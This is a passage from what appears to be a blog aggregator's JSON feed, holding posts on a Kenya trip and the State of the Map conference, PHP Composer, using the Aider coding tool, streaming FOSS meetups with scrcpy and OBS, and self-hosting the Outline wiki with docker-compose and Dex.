Package with Composer? – in Tamil","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F11\u002F08\u002Fhow-to-create-publish-a-php-package-with-composer-%e0%ae%a4%e0%ae%ae%e0%ae%bf%e0%ae%b4%e0%ae%bf%e0%ae%b2%e0%af%8d\u002F","Fri, 08 Nov 2024 17:59:26 +0000","Oct 13, 2024: Creating and publishing PHP packages with PHP Composer is a straightforward process. By following these steps, we can easily share our programs as packages with the PHP community. Composer – the PHP Dependency Manager. Prerequisites: you must have the following installed on your system. Steps: Step 1: Create a directory for our package. Step 2: Initializing the Composer package. Our […]",[224,819,820,821],"composer","kaniyam","tamil",{"slug":823,"title":824,"link":825,"pubDate":826,"contentSnippet":827,"tags":828,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kenya-trip","Asante Kenya for a Good Time","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkenya-trip\u002F","Tue, 05 Nov 2024 00:55:21 +0530","In September of this year, I visited Kenya to attend the State of the Map conference. I spent six nights in the capital Nairobi, two nights in Mombasa, and one night on a train. I was very happy that the visa process was smooth and quick. During the conference, I stayed at the Nairobi Transit Hotel with other attendees, with Ibtehal from Bangladesh as my roommate. I found it interesting that the shops around the hotel were grated, presumably to protect against robberies. The hotel guard had to unlock the hotel for us to go out at night. Further, I noticed that the banks had three layers of security. Despite this, Ibtehal and I used to hang out at a coffee shop around midnight.\n\n      \nThe coffee shop Ibtehal and I used to visit around midnight\n\n      \nGrating at a chemist shop in Mombasa, Kenya\nThe country lies on the equator, which might give the impression of extremely hot temperatures.
However, Nairobi was on the cooler side (10–25 degrees Celsius), and I found myself needing a hoodie, which I bought the next day. It also served as a nice souvenir, as it had an outline of the African map printed on it.\nI also bought a Safaricom SIM card for 100 shillings and recharged it with 1000 shillings for 8 GB internet with 5G speeds and 400 minutes talk time.\nA visit to Nairobi’s Historic Cricket Ground\nOn this trip, I got a unique souvenir that can’t be purchased from the market—a cricket jersey worn in an ODI match by a player. The story goes as follows: I was roaming around the market with my friend Benson from Nairobi to buy a Kenyan cricket jersey for myself, but we couldn’t find any. So, Benson had the idea of visiting the Nairobi Gymkhana Club, which used to be Kenya’s main cricket ground. It has hosted some historic matches, including the 2003 World Cup match in which Kenya beat the mighty Sri Lankans, as well as the 1996 match in which Shahid Afridi set the record for the fastest ODI century, off just 37 balls.\nAlthough entry to the club was exclusively for members, I was warmly welcomed by the staff. Upon reaching the cricket ground, I met some Indian players who played in Kenyan leagues, as well as Lucas Oluoch and Dominic Wesonga, who have represented Kenya in ODIs. When I expressed interest in getting a jersey, Dominic agreed to send me pictures of his. I liked it and collected it from him. I gave him 2000 shillings, an amount suggested by those Indian players.\n\n      \nMe with players at the Nairobi Gymkhana Club\n\n      \nCricket pitch at the Nairobi Gymkhana Club\n\n      \nA view of the cricket ground inside the Nairobi Gymkhana Club\n\n      \nScoreboard at the Nairobi Gymkhana cricket ground\nGiraffe Center in Nairobi\nKenya is known for its safaris and has no shortage of national parks. In fact, Nairobi is the only capital in the world with a national park. I decided not to visit one, as most of them were expensive and offered multi-day tours, and I didn’t want to spend that much time in the wild.\nInstead, I went to the Giraffe Center in Nairobi with Pragya and Rabina. The ticket cost 1500 Kenyan shillings (1000 Indian rupees). In Kenya, matatus - shared vans, usually decorated with portraits of famous people and playing rap songs - are the most popular means of public transport. Reaching the Giraffe Center from our hotel required taking five matatus for 150 shillings and a 2-kilometer walk. The journey back was 90 shillings, suggesting that we didn’t find the most efficient route to get there. At the Giraffe Center, we fed giraffes and took photos.\n\n      \nA matatu with a Notorious BIG portrait.\n\n      \nInside the Giraffe Center\nTrain ride from Nairobi to Mombasa\nI wanted to visit a place outside of Nairobi. Mombasa, a coastal city and the second-largest in Kenya, was a natural choice. It is 500 kilometers from the capital Nairobi. I love trains in general, so I decided to take the SGR train from Nairobi to Mombasa. I tried reserving a seat for myself from home, but found out that the train could only be booked using M-PESA. It is a mobile bank transfer system in Kenya, and I didn’t have an M-PESA account. Therefore, I could not book my ticket in advance. Once I was in Kenya, Pragya’s friend Mary helped me book my ticket. It was a second-class ticket for 1500 shillings (1000 Indian rupees).\nIf you are a tourist, note that local shops in Kenya can facilitate such an M-PESA transfer in exchange for cash.
Your hotel may also provide such a service, so make sure to check with them.\nThe train was scheduled to depart from Nairobi at 08:00 hours and arrive in Mombasa at 14:00 hours. The security check at the station required scanning bags and having them sniffed by sniffer dogs. I also fell victim to a scam by a security official who offered to help me get my ticket printed, only to later ask me to get him some coffee, which I politely declined.\nBefore boarding the train, I was treated to some stunning views at the Nairobi Terminus station. It was a seating train, but I wished it were a sleeper train, as I was sleep-deprived. The train was neat and clean, with good toilets. It reached Mombasa on time.\n\n      \nSGR train at Nairobi Terminus.\n\n      \nInterior of the SGR train\nArrival in Mombasa\n\n      \nMombasa Terminus station.\nMombasa was a bit hotter than Nairobi, with temperatures reaching around 30 degrees Celsius. However, that’s not too hot for me, as I am used to higher temperatures in India. I had booked a hostel in the Old Town and was hoping to hitchhike from the Mombasa Terminus station. After trying for more than half an hour, I took a matatu that dropped me 3 km from my hostel for 200 shillings (140 Indian rupees). I tried to hitchhike again but couldn’t find a ride.\nI think I know why I couldn’t get a ride in both cases. In the first case, the Mombasa Terminus was in an isolated place, so most of the vehicles were taxis or matatus, while any noncommercial cars were there to pick up friends and family. If the station were in the middle of the city, there would be many more car\u002Ftruck drivers passing by, thus increasing my chances of getting a ride. In the second case, my hostel was at the end of the city, and nobody was going towards that side. In fact, many drivers told me they would love to give me a ride, but they were going in some other direction.\nFinally, I took a tuktuk for 70 shillings to reach my hostel, Tulia Backpackers. It was 11 USD (1400 shillings) for one night. The balcony gave a nice view of the Indian Ocean. The rooms had fans, but there was no air conditioning. Each bed also had mosquito nets. The place was within walking distance of the famous Fort Jesus. Mombasa has had more Islamic influence compared to Nairobi and also has many Hindu temples.\n\n      \nThe balcony at Tulia Backpackers Hostel had a nice view of the ocean.\n\n      \nA room inside the hostel with fans and mosquito nets on the beds\nVisiting White Sandy Beaches and Hitchhiking\nVisiting Nyali beach marked my first time ever at a white sand beach. It was about 10 km from the hostel. The next day, I visited Diani Beach, which was 30 km from the hostel. Going to Diani Beach required crossing a river, for which there’s a free ferry service every few minutes, followed by taking a matatu to Ukunda and then a tuktuk. The journey gave me a glimpse of the beautiful countryside of Kenya.\n\n      \nNyali beach is a white sand beach\n\n      \nThis is the ferry service for crossing the river.\nDuring my return from Diani Beach to the hostel, I was successful in hitchhiking. However, it was only a 4 km ride and not sufficient to reach Ukunda, so I tried to get another ride. When a truck stopped for me, I asked for a ride to Ukunda. Later, I learned that they were going in the same direction as me, so I got off within walking distance of my hostel. The ride was around 30 km. I also learned the difference between a truck ride and a matatu or car ride.
For instance, matatus and cars are much faster and cooler due to air conditioning, while trucks tend to be warmer because they lack it. Further, the truck was stopped at many checkpoints by the police for inspections as it carried goods, which is not the case with matatus. Anyways, it was a nice experience, and I am grateful for the ride. I had a nice conversation with the truck drivers about Indian movies and my experiences in Kenya.\n\n      \nDiani beach is a popular beach in Kenya. It is a white sand beach.\n\n      \nSelfie with truck drivers who gave me the free ride\nBack to Nairobi\nI took the SGR train from Mombasa back to Nairobi. This time I took the night train, which departs at 22:00 hours, reaching Nairobi at around 04:00 in the morning. I could not sleep comfortably since the train only had seats, not berths.\nI had booked the Zarita Hotel in Nairobi and had already confirmed that they allowed early morning check-in. Usually, hotels have a fixed checkout time, say 11:00 in the morning, and you are not allowed to stay beyond that regardless of the time you checked in. But this hotel checked me in for 24 hours. Here, I paid in US dollars, and the cost was 12 USD.\nAlmost Got Stuck in Kenya\nTwo days before my scheduled flight from Nairobi back to India, I heard the news that the airports in Kenya were closed due to strikes. Rabina and Pragya had their flight back to Nepal canceled that day, which left them stuck in Nairobi for two additional days. I called Sahil in India and found out during the conversation that the strike had been called off that evening. It was a big relief for me, and I was fortunate to be able to fly back to India without any changes to my plans.\n\n      \nNewspapers at a stand in Kenya covering news on the airport closure\nExperience with locals\nI had no problems communicating with Kenyans, as everyone I met knew English to an extent that could easily surpass that of big cities in India. Additionally, I learned a few words from Kenya’s most popular local language, Swahili, such as “Asante,” meaning “thank you,” “Jambo” for “hello,” and “Karibu” for “welcome.” Knowing a few words in the local language went a long way.\nI am not sure what’s up with haggling in Kenya. It wasn’t easy to bring the price of souvenirs down. I bought a fridge magnet for 200 shillings, which was the quoted price. On the other hand, it was much easier to bargain with taxis\u002Ftuktuks\u002Fmotorbikes.\nI stayed at three hotels\u002Fhostels in Kenya. None of them had air conditioners. Two of the places were in Nairobi, and they didn’t even have fans in the rooms, while the one in Mombasa had only fans. All of them had good Wi-Fi, except Tulia, where the internet was overall a bit shaky.\nMy experience with the hotel staff was great. For instance, we requested that the Nairobi Transit Hotel cancel the included breakfast in order to reduce the room costs, but later realized that it was not a good idea. The hotel allowed us to revert and even served one of the missed breakfasts during dinner.\nThe staff at Tulia Backpackers in Mombasa facilitated the ticket payment for my train from Mombasa to Nairobi. One of the staff members also gave me a lift to the place where I could catch a matatu to Nyali Beach. They even added an extra tea bag to my tea when I requested it to be stronger.\nFood\nAt the Nairobi Transit Hotel, a Spanish omelette with tea was served for breakfast. I noticed that Spanish omelette appeared on the menus of many restaurants, suggesting that it is popular in Kenya.
This was my first time having this dish. The milk tea in Kenya, referred to by locals as “white tea,” is lighter than Indian tea (they don’t put a lot of tea leaves).\n\n      \nSpanish Omelette served at breakfast at Nairobi Transit Hotel\nI also sampled ugali with eggs. In Mombasa, I visited an Indian restaurant called New Chetna and had a buffet thali there twice.\n\n      \nUgali with eggs.\nTips for Exchanging Money\nIn Kenya, I exchanged my money at forex shops a couple of times. I received good exchange rates for bills larger than 50 USD. For instance, 1 USD on xe.com was 129 shillings, and I got 128.3 shillings per USD (a total of 12,830 shillings) for two 50 USD notes at an exchange in Nairobi, while the highest rate at the banks was 127 shillings per USD. On the other hand, for smaller bills such as a one US dollar note, I would have got only 125 shillings per USD. A passport was the only document required for the exchange, and they also provided a receipt.\nMy advice for travelers would be to keep 50 USD or larger bills for exchanging into the local currency while saving the smaller US dollar bills for accommodation, as many hotels and hostels accept payment in US dollars (in addition to Kenyan shillings).\nMissed Malindi and Lamu\nThere were more places on my to-visit list in Kenya. But I simply didn’t have time to cover them, as I don’t like rushing through places, especially in a foreign country where there is a chance of me underestimating the amount of time it takes during transit. I would have liked to visit at least one of Kilifi, Watamu or Malindi beaches. Further, Lamu seemed like a unique place to visit as it has no cars or motorized transport; the only options for transport are boats and donkeys. But I missed Lamu as well.\nThat’s it for now. Meet you in the next one :)",[],{"slug":830,"title":831,"link":832,"pubDate":833,"contentSnippet":834,"tags":835,"maintainerName":68,"maintainerUsername":69,"maintainerPhoto":70,"feedUrl":71},"ubuntu-ssd-e0-ae-b2-e0-af-8d-e0-ae-89-e0-ae-aa-e0-af-81-e0-ae-a3-e0-af-8d-e0-ae-9f-e0-af-81-20-04-lt","Ubuntu: Installing Ubuntu 20.04 LTS on an SSD in dual boot with Windows","https:\u002F\u002Fprogrammerlife1.wordpress.com\u002F2024\u002F10\u002F31\u002Fubuntu-ssd%e0%ae%b2%e0%af%8d-%e0%ae%89%e0%ae%aa%e0%af%81%e0%ae%a3%e0%af%8d%e0%ae%9f%e0%af%81-20-04-lts-%e0%ae%9f%e0%af%82%e0%ae%af%e0%ae%b2%e0%af%8d-%e0%ae%aa%e0%af%82%e0%ae%9f%e0%af%8d-%e0%ae%ae\u002F","Thu, 31 Oct 2024 14:18:45 +0000","Oct 31, 2024. In this post, you can read about my recent experience of installing Ubuntu in dual-boot mode alongside Windows. I have been using the Windows operating system on an SSD. I keep the Ubuntu operating system on another HDD of mine. Since that hard disk is on the verge of failing, I prepared to install Ubuntu on the SSD. Whenever you get ready to install a new operating system, always take a backup first. Note: in my experience of having installed operating systems 3 times, a backup […]",[836,837],"Linux","ubuntu",{"slug":839,"title":840,"link":841,"pubDate":842,"contentSnippet":843,"tags":844,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"using-llm","How I use LLMs","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fusing-llm\u002F","2024-10-30T00:00:00.000Z","Just yesterday, GitHub announced integrating Claude 3.5 Sonnet with Copilot. Interesting times ahead. In my experience, Claude has been remarkably better than the GPT-4 family of models for programming tasks. 
I’ve tried a bunch of tools like Cursor and Continue.dev, but finally settled on Aider for most of my tasks. In this post, I want to write about my workflow of using Aider when working on small coding tasks.\nAider is an open source Python CLI which supports multiple models, including Claude 3.5 Sonnet. Aider describes itself as “AI pair programming in your terminal”. The tool integrates git quite well in its workflow, so it can edit files, create new files, and track all changes via git. If you want to revert, simply revert the commit or use the \u002Fundo shortcut.\nThe tool has multiple modes that serve different purposes:\n\u002Fask: Use it when you simply want to chat with the model about the codebase or explain some pieces of it. This mode won’t touch your files. It’s great for understanding existing code or getting explanations.\n\u002Farchitect: Use it to discuss a broad overall idea. The model will propose some changes to your files. You can further chat and tune it to your preferences.\n\u002Fcode: This will directly edit your files and commit them.\nMy typical workflow involves running Aider in a terminal while keeping VSCode open for manual code review. I often use the --no-auto-commits flag to view the diffs before committing. Despite advances in LLM technology, I believe they haven’t yet reached the stage where they can fully understand your team’s coding style guides, and I prefer not to have a certain style forced upon me. Manually tweaking portions of AI-generated functions still proves helpful and saves considerable time.\nTo begin, aider --sonnet opens the interactive window where you can begin writing prompts.\n\nTo add context, you need to add files using commands like \u002Fadd main.py. What makes Aider powerful is its control over the LLM context - you can \u002Fadd or \u002Fdrop source code, or even \u002Freset to drop all files and start with a fresh context. This granular control helps manage the context window effectively.\nA really cool thing about it is that it gives an approximate idea of the number of tokens (cost) associated with each prompt. I find it useful to remove unnecessary files from the context window, which not only helps in getting sharper, more accurate responses but also helps with the costs. There’s a nice \u002Ftokens command which shows the cost of sending each file added in context with the prompt.\n\nI find the Aider + Claude 3.5 combo works really well when you have a narrow-scoped, well-defined task. For example, this is the prompt I used on a codebase I was working on:\nTheme preference is not preserved when reloading pages or navigating to new pages. We should store this setting in localStorage. Please implement using standard best practices.\n\nUnder the hood, Aider uses tree-sitter to improve code generation and provide rich context about your codebase. Tree-sitter parses your code into an Abstract Syntax Tree (AST), which helps Aider understand the structure and relationships in your code. 
Unlike simpler tools that might just grep through your codebase, tree-sitter understands the actual syntax of your programming language.\nIt can identify function definitions, class declarations, variable scopes, and their relationships\nIt extracts full function signatures and type information\nIt builds a dependency graph showing how different parts of your code relate to each other\nIt helps rank the importance of different code sections based on how often they’re referenced\nThis means when you’re working on a task, Aider isn’t just blindly sending your entire codebase to the LLM. Instead, it creates an optimized “repository map” that fits within your token budget (default is 1k tokens, adjustable via --map-tokens). This map focuses on the most relevant pieces of your code, making sure the LLM understands the context without wasting tokens.\nAider’s approach to AI pair programming feels natural and productive. Here are some example prompts where it helped me build stuff in less than a minute:\nModify fetch method in store\u002Fstore.go to filter out expired entries\nWrite a k6 load test script to benchmark the POST \u002Fsubmit endpoint and simulate real-world traffic patterns\nCreate a Makefile, Dockerfile, goreleaser.yml for my Go binary. Target platforms: arm64 and amd64\n\nI prefer to invoke aider with a few extra flags:\naider --no-auto-commits --cache-prompts --cache-keepalive-pings 12 --no-suggest-shell-commands\nMake sure to go through the Tips page to effectively try out Aider on your existing projects.\nFin!",[],{"slug":846,"title":847,"link":848,"pubDate":849,"contentSnippet":850,"tags":851,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"08-fossmeetup-livestream-html","Streaming our FOSS Meetups using just free software!","https:\u002F\u002Faryak.me\u002Fblog\u002F08-fossmeetup-livestream.html","Thu, 17 Oct 2024 12:39:45 +0000","I volunteer for FOSS United\nMumbai, and we organize meetups related to FOSS every month.\nWe have often done some hacky jugaad to stream our meetups, but due\nto their last-minute nature and lack of proper resources, they have\noften been low quality or failed entirely.\nWith the on-ground experience I have gained as the live streaming\nlead at IndiaFOSS\n2024 and 2023, I wanted to\nput these ideas into a blog-post format, so this could help out the other chapters of FOSS\nUnited, and potentially non-FOSS United events too!\nMy guide is primarily divided into four parts:\nScrcpy, which deals with getting the video of the meetup by\n(ab)using the camera of your phone\nVDO.ninja, which retrieves a high-quality, low-latency stream of the\nspeaker’s screen in a user-friendly manner\nOBS, which combines the outputs of both Scrcpy and VDO.ninja\ntogether with a nice template, to send to the streaming server (OSP, or\nperhaps YouTube)\nOSP (FOSS United specific), which is the web UI which we stream to,\nand use to make clips out of the live stream\nA large part of the guide assumes you use Linux, but it should work\nwith macOS. PS: if you are hosting a FOSS Meetup, streaming from a\nMac\u002FWindows box doesn’t make much sense either way :-)\nScrcpy Setup\nRequirements:\nLaptop with Linux\u002FmacOS (only tested with Linux, though)\nScrcpy 2.x\nAndroid 12+ phone\nOn the phone:\nEnable Developer Options by tapping Build Number 7 times in the\nSoftware Information section of About Phone in the Settings app. 
\nGo to the newly enabled developer options menu, allow USB Debugging.\n\nConnect the phone to the laptop via USB, and authorize the laptop\n\nIf there is no option asking you to authorize, there should be a\nsilent notification in your notif tray regarding USB preferences. Click\nthat and select ADB (if not available, choose file transfer - that should\nbe an equivalent option) \nIt might also be that the cable is old\u002Fdamaged, and does not support\ndata transfer. If the previous option didn’t yield any results, try using a\ndifferent cable\n\n\nOn the laptop:\nInstall ADB\nInstall Scrcpy (Linux\n| macOS\n| Windows)\nRun this command:\n\u002Fusr\u002Flocal\u002Fbin\u002Fscrcpy --video-source=camera --camera-id=0 --audio-source=mic --orientation=90\n\nSometimes the ideal resolution and framerate will not be the perfect\n16:9 one that is required. In that case, add the following arguments:\n--camera-size=1920x1080 --camera-fps=60\nIf you want to add any custom settings, consult this other\nblogpost of mine or the\nscrcpy docs\nIf you want a landscape camera output, remove the --orientation\nflag\nSetting the camera ID to 0 should use the back camera by default,\nbut if the front camera needs to be used, set the ID to 1\n\nThis should open a window with a full-sized preview of the camera:\n\nScreensy \u002F Screenshare Setup\nI would recommend you use this instead of VDO.ninja, ONLY IF BOTH\nDEVICES ARE ON THE SAME NETWORK\u002FWIFI.\nThe Setup\nOn the speaker’s laptop, open https:\u002F\u002Fscreensy.marijn.it. Start\nscreen sharing and note down the URL (making sure that the text that\nfollows the # is included)\nVDO.Ninja \u002F Screenshare Setup\nNOTE: YOU ARE BETTER OFF USING SCREENSY INSTEAD - UNLESS YOU CANNOT\nGET BOTH LAPTOPS ON THE SAME NETWORK.\nRequirements:\nA browser which supports screenshare on the speaker’s PC, any\nbrowser on the streaming PC\nThe Setup:\nOn the streaming PC, open vdo.ninja, and create a room. Give a valid\nroom name, select the “The guests can see the\ndirector, but not other guests’ videos” option, and then enter the\ncontrol centre \nFrom the control centre, copy the link to invite a guest, and ask\nthe next speaker to open it on their laptop. \nOn the speaker’s laptop, select screenshare with room, and then in\nthe settings cogwheel, make it use the highest quality. \nBack on the streaming PC in the control centre, press highlight on\nthe newly appeared preview, and then copy the “capture a group\nscene” link. Keep the link safe, it’s needed in the OBS setup later \nStreaming Platform Setup (specific to FOSS United)\nOn https:\u002F\u002Fstream.fossunited.org, each city chapter\u002Ffoss club can\nrequest an account for streaming and uploading their talks. Log in to the\naccount that is provided to you, navigate to My Channels and create a\nnew channel.\nAdd the specific details like default title, description, profile\npicture etc., and then copy the auto-generated stream key.\nIf you want to stream simultaneously to YouTube, you can add a new\nRTMP Restream Destination in this format:\nrtmp:\u002F\u002Fa.rtmp.youtube.com\u002Flive2\u002F\u003CSTREAM KEY>, and\nenable the new destination. By doing this, all new streams will be\nsimultaneously streamed to YouTube as well. 
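For illustration, assuming a hypothetical stream key of abcd-1234-wxyz (the key here is made up purely for the example; use the one from YouTube Studio), the full restream destination would read:\nrtmp:\u002F\u002Fa.rtmp.youtube.com\u002Flive2\u002Fabcd-1234-wxyz 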
\nMaking a clip for each talk\nAfter the live stream has ended, you might want to separate the\nstream into smaller chunks, with a separate video for each of the talks.\nThis can be done using the clips feature of OSP.\nOnce the stream ends, the stream will be converted into a recording\nand uploaded to the channel from where it was being streamed.\nOpen the video and click the cogwheel, from where you can select the\ncreate clip option. Using the slider, move to the desired start and end\npoint, give it a valid description and title, and then create the clip.\nA video is attached for reference:\nVideo\nOBS Setup\nRequirements:\nAn OBS installation, with the default browser plugin enabled (the\nplugin is not enabled on Debian as of writing FYI, so use the Flatpak\nversion if on Debian)\n\n\nAn X11 environment (if under Wayland, run\nenv -u WAYLAND_DISPLAY obs)\n\n\nRun the setup wizard, optimize for streaming, and use 1920x1080 as\nthe base resolution. For the stream key, enter the one from your service\nprovider (if you are using OSP, consult the OSP section above)\n\n\nDisable MIC\u002FAUX, and keep Desktop Audio enabled\n\n\nIn OBS, add a window source (labelled XComposite Window Capture\non Linux) for scrcpy\n\n\nIn OBS, add a browser source, and make the URL point towards the\nscreensy link that you copied initially. If you are using VDO.ninja\ninstead, the URL will be the “capture a group scene” link from the\nVDO.ninja setup.\n\n\nAt the end, it should look something like this: \n\n\nStart streaming!",[852],"2024\u002F10\u002F17\u002F4",{"slug":854,"title":855,"link":856,"pubDate":857,"contentSnippet":858,"tags":859,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"decentralised-open-indexes","Decentralised Open Indexes for Discovery (DOID)","https:\u002F\u002Fnadh.in\u002Fblog\u002Fdecentralised-open-indexes\u002F","Wed, 02 Oct 2024 00:00:00 +0000","TLDR; A conceptual and technical framework for resource discovery on the WWW using decentralised, open, machine-readable indexes as the building block, free of eroding quality and gatekeeping by BigSearch™ and BigPlatform™, whose goals are not quality, but revenue.",[],{"slug":861,"title":862,"link":863,"pubDate":864,"contentSnippet":865,"tags":866,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"sotm-2024","State of the Map Conference in Kenya","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsotm-2024\u002F","Tue, 01 Oct 2024 19:35:30 +0530","Last month, I traveled to Kenya to attend a conference called State of the Map 2024 (“SotM” for short), which is an annual meetup of OpenStreetMap contributors from all over the world. It was held at the University of Nairobi Towers in Nairobi, from the 6th to the 8th of September.\n\n      \nUniversity of Nairobi.\nI have been contributing to OpenStreetMap for the last three years, and this conference seemed like a great opportunity to network with others in the community. As soon as I came across the travel grant announcement, I jumped in and filled out the form immediately. I was elated when I was selected for the grant and couldn’t wait to attend. The grant had an upper limit of €1200 and covered food, accommodation, travel and miscellaneous expenses such as the visa fee.\nPre-travel tasks included obtaining Kenya’s eTA and getting a yellow fever vaccine. Before the conference, Mikko from the Humanitarian OpenStreetMap Team introduced me to Rabina and Pragya from Nepal, Ibtehal from Bangladesh, and Sajeevini from Sri Lanka. 
We all booked the Nairobi Transit Hotel, which was within walking distance of the conference venue. Pragya, Rabina, and I traveled together from Delhi to Nairobi, while Ibtehal was my roommate in the hotel.\n\n      \nOur group at the conference.\nThe venue, University of Nairobi Towers, was a tall building and the conference was held on the fourth, fifth and sixth floors. The open area on the fifth floor of the building had a nice view of Nairobi’s skyline and was a perfect spot for taking pictures. Interestingly, the university had a wing dedicated to Mahatma Gandhi, who is regarded in India as the Father of the Nation.\n\n      \nView of Nairobi's skyline from the open area on the fifth floor.\n\n      \nA library in Mahatma Gandhi wing of the University of Nairobi.\nThe diversity of the participants was mind-blowing, with people coming from a whopping 54 countries. I was surprised to notice that I was the only participant traveling from India, despite India having a large OpenStreetMap community. That said, there were two other Indian participants who traveled from other countries. I finally got to meet Arnalie (from the Philippines) and Letwin (from Zimbabwe), both of whom I had only met online before. I had met Anisa (from Albania) earlier during DebConf 2023. But I missed Mikko and Honey from the Humanitarian OpenStreetMap Team, whom I knew from the Open Mapping Guru program.\nI learned about the extent of OSM use through Pragya and Rabina’s talk; about the logistics of running the OSM Board in the OSMF (OpenStreetMap Foundation) session; about the Youth Mappers from Sajeevini; about OSM activities in Malawi from Priscilla Kapolo; and about mapping in Zimbabwe from Letwin. However, I missed Ibtehal’s lightning session. The ratio of women speakers and participants at the conference was impressive, and I hope we can get such gender representation in our Delhi\u002FNCR mapping parties.\n\n      \nOne of the conference halls where talks took place.\nOutside of talks, the conference also had lunch and snack breaks, giving ample time for networking with others. In the food department, there were many options for a lacto-ovo vegetarian like myself, including potatoes, rice, beans, chips etc. I found out that the milk tea in Kenya (referred to as “white tea”) is usually not as strong as in India, so I switched to coffee (which is also called “white coffee” when taken with milk). The food wasn’t spicy, but I can’t complain :) Fruit juices served as a nice addition to lunch.\n\n      \nOne of the lunch meals served during the conference.\nAt the end of the second day of the conference, there was a surprise in store for us — a bus ride to the Bao Box restaurant. The ride gave us the experience of a typical Kenyan matatu (privately-owned minibuses used as share taxis), complete with loud rap music. I remember one of the songs being Kraff’s Nursery Rhymes. That day, I was wearing an original Kenyan cricket jersey - one that belonged to Dominic Wesonga, who represented Kenya in four ODIs. This confused Priscilla Kapolo, who asked if I was from Kenya! Anyway, while it served as a good conversation starter, it didn’t attract as much attention as I expected :) I had some pizza and chips there, and later some drinks with Ibtehal. 
After the party, Piyush went with us to our hotel and we played a few games of UNO.\n\n      \nMinibus which took us from the university to Bao Box restaurant.\n\n      \nThis minibus in the picture gave a sense of a real matatu.\nI am grateful to the organizers Laura and Dorothea for introducing me to Nikhil when I was searching for a companion for my post-conference trip. Nikhil was one of the aforementioned Indian participants, and a wildlife lover. We had some nice conversations; he wanted to go to the Maasai Mara National Reserve, but it was too expensive for me. In addition, all the safaris were multi-day affairs, and I wasn’t keen on being around wildlife for that long. Eventually I chose to go my own way, exploring the coastal side and visiting Mombasa.\nWhile most of the work regarding the conference was done using free software (including the reimbursement form and Mastodon announcements), I was disappointed by the use of WhatsApp for coordination with the participants. I don’t use WhatsApp and so was left out. WhatsApp is proprietary software (they do not provide the source code) and users don’t control it. It is common to highlight that OpenStreetMap is controlled by users and the community, rather than a company - the same principle should apply to our communication tools as well.\nMy suggestion is to use XMPP, which shares similar principles with OpenStreetMap, as it is privacy-respecting, controlled by users, and powered by free software. I understand the concern that there might not be many participants using XMPP already. Although it is a good idea to onboard people to free software like XMPP, we can also create a Matrix group, and bridge it with both the XMPP group and the Telegram group. In fact, using Matrix and bridging it with Telegram is how I communicated with the South Asian participants. It’s not ideal - Telegram’s servers are proprietary and centralized - but it’s certainly much better than creating a WhatsApp-only group. The setup can be bridged with IRC as well. A self-hosted mailing list for participants is also a good idea.\nFinally, I would like to thank SotM for the generous grant, enabling me to attend this conference, meet the diverse community behind OSM and visit the beautiful country of Kenya. Stay tuned for the blog post on the Kenya trip.\nThanks to Sahilister, Contrapunctus, Snehal and Badri for reviewing the draft of this blog post before publishing.",[],{"slug":868,"title":869,"link":870,"pubDate":871,"contentSnippet":872,"tags":873,"maintainerName":150,"maintainerUsername":151,"maintainerPhoto":152,"feedUrl":153},"the-end-of-suffering","The End of Suffering","https:\u002F\u002Fwww.prashanthudupa.com\u002Fthe-end-of-suffering\u002F","Tue, 01 Oct 2024 06:10:22 +0000","I think the purpose of meditation matters a lot. If we are after enlightenment, then its pursuit becomes a craving in itself and that ends up being a hindrance. However, if our intention is to end suffering, then we have a far more practical goal and in fact letting go of craving becomes so much more […]",[148],{"slug":875,"title":876,"link":877,"pubDate":878,"contentSnippet":879,"tags":880,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"setting-outline","Self Hosting Outline Wiki","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsetting-outline\u002F","2024-09-20T00:00:00.000Z","I recently discovered Outline, a collaborative knowledge base. I wanted to self-host it on my server, but the mandatory auth provider requirement was off-putting. 
My server is on a private encrypted network (Tailscale) that only my approved devices in the tailnet can access, so I don’t really need authentication for my personal single-use apps. I found a few guides using Authelia\u002FKeycloak, but these are heavy-duty applications that would consume a lot of resources (DBs, caches, proxies, and whatnot) just to have an OIDC provider for Outline.\nThere had to be a simpler way, right? Enter Dex. As recommended by my friend and colleague Chinmay, it turned out to be quite easy.\nHere’s the full docker-compose.yml setup you need to get Outline up and running on your local instance!\nservices:\n\n  outline:\n    image: docker.getoutline.com\u002Foutlinewiki\u002Foutline:latest\n    env_file: .\u002Fdocker.env\n    ports:\n      - \"3000:3000\"\n    volumes:\n      - storage-data:\u002Fvar\u002Flib\u002Foutline\u002Fdata\n    depends_on:\n      - postgres\n      - redis\n    environment:\n      PGSSLMODE: disable\n\n  redis:\n    image: redis\n    env_file: .\u002Fdocker.env\n    ports:\n      - \"6379:6379\"\n    healthcheck:\n      test: [ \"CMD\", \"redis-cli\", \"ping\" ]\n      interval: 10s\n      timeout: 30s\n      retries: 3\n\n  postgres:\n    image: postgres\n    env_file: .\u002Fdocker.env\n    ports:\n      - \"5432:5432\"\n    volumes:\n      - database-data:\u002Fvar\u002Flib\u002Fpostgresql\u002Fdata\n    healthcheck:\n      test: [ \"CMD\", \"pg_isready\", \"-d\", \"outline\", \"-U\", \"user\" ]\n      interval: 30s\n      timeout: 20s\n      retries: 3\n    environment:\n      POSTGRES_USER: 'user'\n      POSTGRES_PASSWORD: 'pass'\n      POSTGRES_DB: 'outline'\n\n  dex:\n    image: dexidp\u002Fdex:v2.35.3\n    ports:\n      - \"5556:5556\"\n    volumes:\n      - .\u002Fdex:\u002Fetc\u002Fdex\n    command: [ \"dex\", \"serve\", \"\u002Fetc\u002Fdex\u002Fconfig.yaml\" ]\n\nvolumes:\n  storage-data:\n  database-data:\n\nYou’ll need to add the following env variables as 